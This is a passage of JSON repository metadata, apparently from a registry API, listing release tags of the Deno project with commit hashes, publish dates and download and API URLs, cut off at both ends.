3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/ta